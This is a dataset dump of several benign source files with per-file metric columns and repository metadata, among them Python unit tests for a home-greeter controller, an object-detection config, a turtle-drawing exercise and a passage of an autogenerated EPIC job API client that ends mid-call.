0.269841
0.396825
0
0
0
0
0
0
0
0
0.125786
159
6
36
26.5
0.906475
0.163522
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
732a7f1b37ad96fab6aa4da3fc66718cb6bb5617
11,617
py
Python
tests/test_controller.py
samfrench/home-greeter
d03451912162c59e790989fd773fa1fbe66431e2
[ "MIT" ]
null
null
null
tests/test_controller.py
samfrench/home-greeter
d03451912162c59e790989fd773fa1fbe66431e2
[ "MIT" ]
null
null
null
tests/test_controller.py
samfrench/home-greeter
d03451912162c59e790989fd773fa1fbe66431e2
[ "MIT" ]
null
null
null
from unittest import TestCase from mock import Mock, call, patch # Mocking picamera module before camera import import sys sys.modules['picamera'] = Mock() from home_greeter.controller import Controller class TestControllerWithVisitorAndOccupierIn(TestCase): def setUp(self): self.mock_detector = Mock(autospec='home_greeter.detector.Detector') self.mock_greeter = Mock(autospec='home_greeter.greeter.Greeter') self.mock_camera = Mock(autospec='home_greeter.Camera') self.mock_imager = Mock(autospec='home_greeter.imager.Imager') self.mock_tweeter = Mock(autospec='home_greeter.Tweeter') self.controller = Controller( detector = self.mock_detector, greeter = self.mock_greeter, camera = self.mock_camera, imager = self.mock_imager, tweeter = self.mock_tweeter ) self.mock_imager.is_delivery.return_value = False # Mock out the visitor self.channel = 1 # This can be anything, but a channel number is provided when an event is detected self.controller.should_run(False) def test_create(self): self.assertIsInstance(self.controller, Controller) def test_run_calls_detector_subscribe(self): self.controller.run() self.mock_detector.subscribe.assert_called_once_with(self.controller._Controller__process) def test_greeter_welcome_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.welcome.assert_called_once() def test_camera_take_photo_for_detection_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.INITIAL_PHOTO)]) def test_greeter_ask_for_visitor_name_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_for_visitor_name.assert_called_once() def test_greeter_ask_for_occupier_name_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_for_occupier_name.assert_called_once() def test_greeter_update_visitor_about_asking_for_occupier_is_called(self): with patch.object(self.mock_greeter, 'ask_for_visitor_name', return_value='Bob'): with patch.object(self.mock_greeter, 'ask_for_occupier_name', return_value='Alice'): self.controller._Controller__process(self.channel) self.mock_greeter.update_visitor_about_asking_for_occupier.assert_called_once_with('Bob', 'Alice') def test_greeter_request_occupier_come_to_the_door_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.request_occupier_come_to_the_door.assert_called_once() # Multiple items are returned when waiting for input # As long as the first is True this will stop the application flow @patch('select.select', return_value=[True, None, None]) def test_occupier_at_door_so_no_other_methods_called(self, keypress): self.controller._Controller__process(self.channel) self.mock_greeter.take_message_for_occupier.assert_not_called() self.mock_greeter.take_photo.assert_not_called() self.mock_camera.take_photo.assert_called_once_with(Controller.INITIAL_PHOTO) self.mock_tweeter.tweet_message_with_image.assert_not_called() self.mock_greeter.thank_visitor.assert_not_called() class TestControllerWithVisitorAndOccupierOut(TestCase): def setUp(self): self.mock_detector = Mock(autospec='home_greeter.Detector') self.mock_greeter = Mock(autospec='home_greeter.Greeter') self.mock_camera = Mock(autospec='home_greeter.Camera') self.mock_imager = Mock(autospec='home_greeter.imager.Imager') self.mock_tweeter = Mock(autospec='home_greeter.Tweeter') self.controller = Controller( detector = self.mock_detector, greeter = self.mock_greeter, camera = self.mock_camera, imager = self.mock_imager, tweeter = self.mock_tweeter ) self.mock_imager.is_delivery.return_value = False # Mock out the visitor self.channel = 1 # This can be anything, but a channel number is provided when an event is detected self.controller.should_run(False) def test_create(self): self.assertIsInstance(self.controller, Controller) def test_run_calls_detector_subscribe(self): self.controller.run() self.mock_detector.subscribe.assert_called_once_with(self.controller._Controller__process) def test_greeter_welcome_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.welcome.assert_called_once() def test_camera_take_photo_for_detection_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.INITIAL_PHOTO)]) def test_greeter_ask_for_visitor_name_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_for_visitor_name.assert_called_once() def test_greeter_ask_for_occupier_name_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_for_occupier_name.assert_called_once() def test_greeter_update_visitor_about_asking_for_occupier_is_called(self): with patch.object(self.mock_greeter, 'ask_for_visitor_name', return_value='Bob'): with patch.object(self.mock_greeter, 'ask_for_occupier_name', return_value='Alice'): self.controller._Controller__process(self.channel) self.mock_greeter.update_visitor_about_asking_for_occupier.assert_called_once_with('Bob', 'Alice') def test_greeter_request_occupier_come_to_the_door_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.request_occupier_come_to_the_door.assert_called_once() def test_greeter_take_message_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.take_message_for_occupier.assert_called_once() def test_greeter_take_photo_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.take_photo.assert_called_once() def test_camera_take_photo_of_visitor_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.VISITOR_PHOTO)]) def test_tweeter_tweet_message_with_image_is_called(self): with patch.object(self.mock_greeter, 'take_message_for_occupier', return_value='I am outside'): self.controller._Controller__process(self.channel) self.mock_tweeter.tweet_message_with_image.assert_called_once_with('I am outside', Controller.VISITOR_PHOTO) def test_greeter_thank_visitor_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.thank_visitor.assert_called_once() class TestControllerWithDeliveryAndSomeoneIn(TestCase): def setUp(self): self.mock_detector = Mock(autospec='home_greeter.detector.Detector') self.mock_greeter = Mock(autospec='home_greeter.greeter.Greeter') self.mock_camera = Mock(autospec='home_greeter.Camera') self.mock_imager = Mock(autospec='home_greeter.imager.Imager') self.mock_tweeter = Mock(autospec='home_greeter.Tweeter') self.controller = Controller( detector = self.mock_detector, greeter = self.mock_greeter, camera = self.mock_camera, imager = self.mock_imager, tweeter = self.mock_tweeter ) self.mock_imager.is_delivery.return_value = True # Mock out the delivery self.channel = 1 # This can be anything, but a channel number is provided when an event is detected self.controller.should_run(False) def test_create(self): self.assertIsInstance(self.controller, Controller) def test_run_calls_detector_subscribe(self): self.controller.run() self.mock_detector.subscribe.assert_called_once_with(self.controller._Controller__process) def test_greeter_welcome_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.welcome.assert_called_once() def test_camera_take_photo_for_detection_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.INITIAL_PHOTO)]) def test_greeter_says_to_wait_for_someone(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_deliverer_to_wait.assert_called_once() def test_greeter_request_someone_come_to_the_door_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.request_someone_come_to_the_door.assert_called_once() # Multiple items are returned when waiting for input # As long as the first is True this will stop the application flow @patch('select.select', return_value=[True, None, None]) def test_occupier_at_door_so_no_other_methods_called(self, keypress): self.controller._Controller__process(self.channel) self.mock_greeter.ask_deliverer_to_leave_parcel.assert_not_called() class TestControllerWithDeliveryAndNobodyIn(TestCase): def setUp(self): self.mock_detector = Mock(autospec='home_greeter.detector.Detector') self.mock_greeter = Mock(autospec='home_greeter.greeter.Greeter') self.mock_camera = Mock(autospec='home_greeter.Camera') self.mock_imager = Mock(autospec='home_greeter.imager.Imager') self.mock_tweeter = Mock(autospec='home_greeter.Tweeter') self.controller = Controller( detector = self.mock_detector, greeter = self.mock_greeter, camera = self.mock_camera, imager = self.mock_imager, tweeter = self.mock_tweeter ) self.mock_imager.is_delivery.return_value = True # Mock out the delivery self.channel = 1 # This can be anything, but a channel number is provided when an event is detected self.controller.should_run(False) def test_create(self): self.assertIsInstance(self.controller, Controller) def test_run_calls_detector_subscribe(self): self.controller.run() self.mock_detector.subscribe.assert_called_once_with(self.controller._Controller__process) def test_greeter_welcome_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.welcome.assert_called_once() def test_camera_take_photo_for_detection_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.INITIAL_PHOTO)]) def test_greeter_says_to_wait_for_someone(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_deliverer_to_wait.assert_called_once() def test_greeter_request_someone_come_to_the_door_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.request_someone_come_to_the_door.assert_called_once() def test_ask_deliverer_to_leave_parcel_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_deliverer_to_leave_parcel.assert_called_once()
49.224576
120
0.747353
1,486
11,617
5.431359
0.080754
0.084252
0.118944
0.122909
0.941643
0.926775
0.910296
0.902738
0.882419
0.871639
0
0.000416
0.17242
11,617
235
121
49.434043
0.839089
0.059051
0
0.819149
0
0
0.061555
0.033526
0
0
0
0
0.212766
1
0.212766
false
0
0.021277
0
0.255319
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
8
733a9861e29f6ac3de81b6825a251ecd4d36299d
128
py
Python
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_0/_pkg1_1_0_1/_pkg1_1_0_1_1/_mod1_1_0_1_1_3.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_0/_pkg1_1_0_1/_pkg1_1_0_1_1/_mod1_1_0_1_1_3.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_0/_pkg1_1_0_1/_pkg1_1_0_1_1/_mod1_1_0_1_1_3.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
name1_1_0_1_1_3_0 = None name1_1_0_1_1_3_1 = None name1_1_0_1_1_3_2 = None name1_1_0_1_1_3_3 = None name1_1_0_1_1_3_4 = None
14.222222
24
0.820313
40
128
1.875
0.175
0.4
0.466667
0.533333
0.88
0.88
0.746667
0
0
0
0
0.318182
0.140625
128
9
25
14.222222
0.363636
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
1
null
1
1
1
1
1
1
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
b42c67e02472148039f4fa6e851e1eac6b1245df
170
py
Python
commands/__init__.py
applanga/applanga-cli
6ca7218f30ff8ea62f660eeebf6e0db3ac908267
[ "MIT" ]
2
2018-06-27T12:28:19.000Z
2021-10-05T04:31:38.000Z
commands/__init__.py
applanga/applanga-cli
6ca7218f30ff8ea62f660eeebf6e0db3ac908267
[ "MIT" ]
null
null
null
commands/__init__.py
applanga/applanga-cli
6ca7218f30ff8ea62f660eeebf6e0db3ac908267
[ "MIT" ]
2
2020-01-24T16:49:34.000Z
2021-06-10T11:08:40.000Z
from commands import config from commands import init from commands import pull from commands import push from commands import pullSource from commands import pushTarget
24.285714
31
0.858824
24
170
6.083333
0.375
0.493151
0.739726
0
0
0
0
0
0
0
0
0
0.141176
170
6
32
28.333333
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
b45a5be5999353c0c2fe3648d6823d398f42f0a0
165
py
Python
tests_example/test_module_three.py
elpassion/danger-py-cov
343b63154edf3980b2071a121206a1f31f20b7b0
[ "MIT" ]
1
2020-02-17T10:19:42.000Z
2020-02-17T10:19:42.000Z
tests_example/test_module_three.py
elpassion/danger-py-cov
343b63154edf3980b2071a121206a1f31f20b7b0
[ "MIT" ]
5
2020-02-04T15:27:47.000Z
2020-02-14T10:42:08.000Z
tests_example/test_module_three.py
elpassion/danger-py-cov
343b63154edf3980b2071a121206a1f31f20b7b0
[ "MIT" ]
1
2020-02-14T13:16:48.000Z
2020-02-14T13:16:48.000Z
from danger_py_cov_example.module_three import squarer def test_squarer_works_for_zero(): """ Test squarer works for 0. """ assert squarer(0) == 0
18.333333
54
0.69697
24
165
4.458333
0.666667
0.205607
0.299065
0.35514
0
0
0
0
0
0
0
0.023077
0.212121
165
8
55
20.625
0.8
0.151515
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
9
b467a733ae24ea1e8e9cfd14457ce4643da4d5c3
5,483
py
Python
data/config.py
outsidercsy/PeleeNet_Detection_pytorch
675b5c0bd75ff880e47d605df0dc944db0756873
[ "MIT" ]
3
2019-10-30T00:43:46.000Z
2020-01-10T13:32:45.000Z
data/config.py
outsidercsy/PeleeNet_Detection_pytorch
675b5c0bd75ff880e47d605df0dc944db0756873
[ "MIT" ]
null
null
null
data/config.py
outsidercsy/PeleeNet_Detection_pytorch
675b5c0bd75ff880e47d605df0dc944db0756873
[ "MIT" ]
2
2019-11-19T01:56:15.000Z
2020-05-24T01:44:44.000Z
# config.py import os.path # gets home dir cross platform HOME = os.path.expanduser("/workspace2/csy")####origin is "~" # for making bounding boxes pretty COLORS = ((255, 0, 0, 128), (0, 255, 0, 128), (0, 0, 255, 128), (0, 255, 255, 128), (255, 0, 255, 128), (255, 255, 0, 128)) MEANS = (104, 117, 123)####bgr # SSD300 CONFIGS voc = { 'num_classes': 21, 'lr_steps': (80000, 100000, 150000, 200000), 'max_iter': 200000, 'feature_maps': [19, 19, 10, 5, 3, 1], 'min_dim': 304, 'steps': [16, 16, 30, 61, 101, 304], 'min_sizes': [30, 60, 111, 162, 213, 264], 'max_sizes': [60, 111, 162, 213, 264, 315], 'aspect_ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]], 'variance': [0.1, 0.2], 'clip': True, 'name': 'VOC', 'anchor_nums': [4, 6, 6, 6, 4, 4],#### 'flip': True,#### } holo = { 'num_classes': 15, 'lr_steps': (30000, 100000, 120000), 'max_iter': 120000, 'feature_maps': [19, 19, 10, 5, 3, 1], 'min_dim': 304, 'steps': [16, 16, 30, 61, 101, 304], 'min_sizes': [30, 60, 111, 162, 213, 264], 'max_sizes': [60, 111, 162, 213, 264, 315], 'aspect_ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]], 'variance': [0.1, 0.2], 'clip': True, 'name': 'HOLO', 'anchor_nums': [4, 6, 6, 6, 4, 4],#### 'flip': True,#### } holov2 = { 'num_classes': 7, 'lr_steps': (100000, 150000, 200000), 'max_iter': 200000, 'feature_maps': [19, 19, 10, 5, 3, 1], 'min_dim': 304, 'steps': [16, 16, 30, 61, 101, 304], 'min_sizes': [30, 60, 111, 162, 213, 264], 'max_sizes': [60, 111, 162, 213, 264, 315], 'aspect_ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]], 'variance': [0.1, 0.2], 'clip': True, 'name': 'HOLOV2', 'anchor_nums': [4, 6, 6, 6, 4, 4],#### 'flip': True,#### } coco = { 'num_classes': 201, 'lr_steps': (280000, 360000, 400000), 'max_iter': 400000, 'feature_maps': [19, 19, 10, 5, 3, 1], 'min_dim': 304, 'steps': [16, 16, 30, 61, 101, 304], 'min_sizes': [21, 45, 99, 153, 207, 261], 'max_sizes': [45, 99, 153, 207, 261, 315], 'aspect_ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]], 'variance': [0.1, 0.2], 'clip': True, 'name': 'COCO', 'anchor_nums': [4, 6, 6, 6, 4, 4],#### 'flip': True,#### } icdar2015 = { #### 'num_classes': 2, 'lr_steps': (30000, 70000, 150000), 'max_iter': 150000, 'feature_maps': [19, 19, 10, 5, 3, 1], 'min_dim': 304, 'steps': [16, 16, 30, 61, 101, 304], # 'min_sizes': [30, 60, 111, 162, 213, 264], # 'max_sizes': [60, 111, 162, 213, 264, 315], # 'aspect_ratios': [[2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10]], ###0.34 ave_iou 'min_sizes': [15, 30, 90, 162, 213, 264], 'max_sizes': [30, 90, 162, 213, 264, 315], 'aspect_ratios': [[2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5]], ####add anchor 0.44 ave_iou # 'min_sizes': [30, 60, 111, 162, 213, 264], # 'max_sizes': [60, 111, 162, 213, 264, 315], # 'aspect_ratios': [[2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5]], 'variance': [0.1, 0.2], 'clip': True, 'name': 'ICDAR2015', 'anchor_nums': [8, 8, 8, 8, 8, 8],#### 'flip': True,#### } icdar2013 = { #### 'num_classes': 2, 'lr_steps': (0, 15000), 'max_iter': 20010, 'feature_maps': [19, 19, 10, 5, 3, 1], 'min_dim': 304, 'steps': [16, 16, 30, 61, 101, 304], 'min_sizes': [30, 60, 111, 162, 213, 264], 'max_sizes': [60, 111, 162, 213, 264, 315], 'aspect_ratios': [[2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10]], # 'min_sizes': [15, 30, 90, 162, 213, 264], # 'max_sizes': [30, 90, 162, 213, 264, 315], # 'aspect_ratios': [[2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5]], 'variance': [0.1, 0.2], 'clip': True, 'name': 'ICDAR2013', 'anchor_nums': [7, 7, 7, 7, 7, 7],#### 'flip': False,#### # 'anchor_nums': [11, 11, 11, 11, 11, 11],#### # 'flip': True,#### } synthtext = { ####pretrain for icdar2013 # 'num_classes': 2, # 'lr_steps': (30000, 60000), # 'max_iter': 50010, # 'feature_maps': [19, 19, 10, 5, 3, 1], # 'min_dim': 304, # 'steps': [16, 16, 30, 61, 101, 304], # # 'min_sizes': [15, 30, 90, 162, 213, 264], # # 'max_sizes': [30, 90, 162, 213, 264, 315], # # 'aspect_ratios': [[2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5]], # 'min_sizes': [30, 60, 111, 162, 213, 264], # 'max_sizes': [60, 111, 162, 213, 264, 315], # 'aspect_ratios': [[2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10], [2,3,5,7,10]], # 'variance': [0.1, 0.2], # 'clip': True, # 'name': 'SynthText', # 'anchor_nums': [7, 7, 7, 7, 7, 7],#### # 'flip': False,#### 1/ar needed or not ####pretrain for icdar2015 'num_classes': 2, 'lr_steps': (30000, 60000), 'max_iter': 50010, 'feature_maps': [19, 19, 10, 5, 3, 1], 'min_dim': 304, 'steps': [16, 16, 30, 61, 101, 304], 'min_sizes': [15, 30, 90, 162, 213, 264], 'max_sizes': [30, 90, 162, 213, 264, 315], 'aspect_ratios': [[2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5], [2,3,5]], 'variance': [0.1, 0.2], 'clip': True, 'name': 'SynthText', 'anchor_nums': [8, 8, 8, 8, 8, 8],#### 'flip': True,#### }
30.977401
115
0.472552
907
5,483
2.76075
0.125689
0.047923
0.057508
0.039936
0.784744
0.769569
0.755192
0.738818
0.738818
0.738818
0
0.290401
0.249498
5,483
177
116
30.977401
0.318105
0.256064
0
0.598291
0
0
0.215681
0
0
0
0
0
0
1
0
false
0
0.008547
0
0.008547
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
81f18846838ba09698e64433a734c02341635c86
1,185
py
Python
stage05-artist1/s1level31.py
xenomorff/code-dot-org-python
7b35999dc35fa9ca13c683f43eca631dc92e5da4
[ "Unlicense" ]
null
null
null
stage05-artist1/s1level31.py
xenomorff/code-dot-org-python
7b35999dc35fa9ca13c683f43eca631dc92e5da4
[ "Unlicense" ]
null
null
null
stage05-artist1/s1level31.py
xenomorff/code-dot-org-python
7b35999dc35fa9ca13c683f43eca631dc92e5da4
[ "Unlicense" ]
null
null
null
"""Stage 5: Puzzle 8 of 10 Ok, try to figure out what happens when you run this code. Then, repeat it enough times to complete the drawing. The colors will be different every time. """ import sys sys.path.append('..') import codestudio artist = codestudio.load('s1level31') a = artist artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.check()
24.183673
58
0.795781
185
1,185
4.924324
0.275676
0.193194
0.149287
0.201976
0.7618
0.7618
0.7618
0.7618
0.7618
0.7618
0
0.065438
0.084388
1,185
48
59
24.6875
0.774194
0.150211
0
0.842105
0
0
0.011011
0
0
0
0
0
0
1
0
false
0
0.052632
0
0.052632
0
0
0
0
null
0
0
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c3195c5315af5c91144e68acebda861718e6c514
55,599
py
Python
epiccore/api/job_api.py
zenotech/python_epic_api
2eaefc98fefc1d7fff46ba1b7ce6e4019d6d7386
[ "FTL" ]
null
null
null
epiccore/api/job_api.py
zenotech/python_epic_api
2eaefc98fefc1d7fff46ba1b7ce6e4019d6d7386
[ "FTL" ]
null
null
null
epiccore/api/job_api.py
zenotech/python_epic_api
2eaefc98fefc1d7fff46ba1b7ce6e4019d6d7386
[ "FTL" ]
null
null
null
# coding: utf-8 """ EPIC API REST API for interacting with EPIC (https://epic.zenotech.com) services. <br /> Please note this API is in BETA and does not yet contain all EPIC functionality. # noqa: E501 The version of the OpenAPI document: v2 Contact: support@zenotech.com Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from epiccore.api_client import ApiClient from epiccore.exceptions import ( # noqa: F401 ApiTypeError, ApiValueError ) class JobApi(object): """NOTE: This class is auto generated by OpenAPI Generator Ref: https://openapi-generator.tech Do not edit the class manually. """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def job_auth_read(self, id, **kwargs): # noqa: E501 """job_auth_read # noqa: E501 Get the authorisation status for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_auth_read(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: JobAuthStatus """ kwargs['_return_http_data_only'] = True return self.job_auth_read_with_http_info(id, **kwargs) # noqa: E501 def job_auth_read_with_http_info(self, id, **kwargs): # noqa: E501 """job_auth_read # noqa: E501 Get the authorisation status for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_auth_read_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(JobAuthStatus, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_auth_read" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_auth_read`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/auth/', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobAuthStatus', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_auth_update(self, id, data, **kwargs): # noqa: E501 """job_auth_update # noqa: E501 Update the authorisation status for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_auth_update(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: JobAuthStatus :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: JobAuthStatus """ kwargs['_return_http_data_only'] = True return self.job_auth_update_with_http_info(id, data, **kwargs) # noqa: E501 def job_auth_update_with_http_info(self, id, data, **kwargs): # noqa: E501 """job_auth_update # noqa: E501 Update the authorisation status for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_auth_update_with_http_info(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: JobAuthStatus :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(JobAuthStatus, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id', 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_auth_update" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_auth_update`") # noqa: E501 # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_auth_update`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/auth/', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobAuthStatus', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), 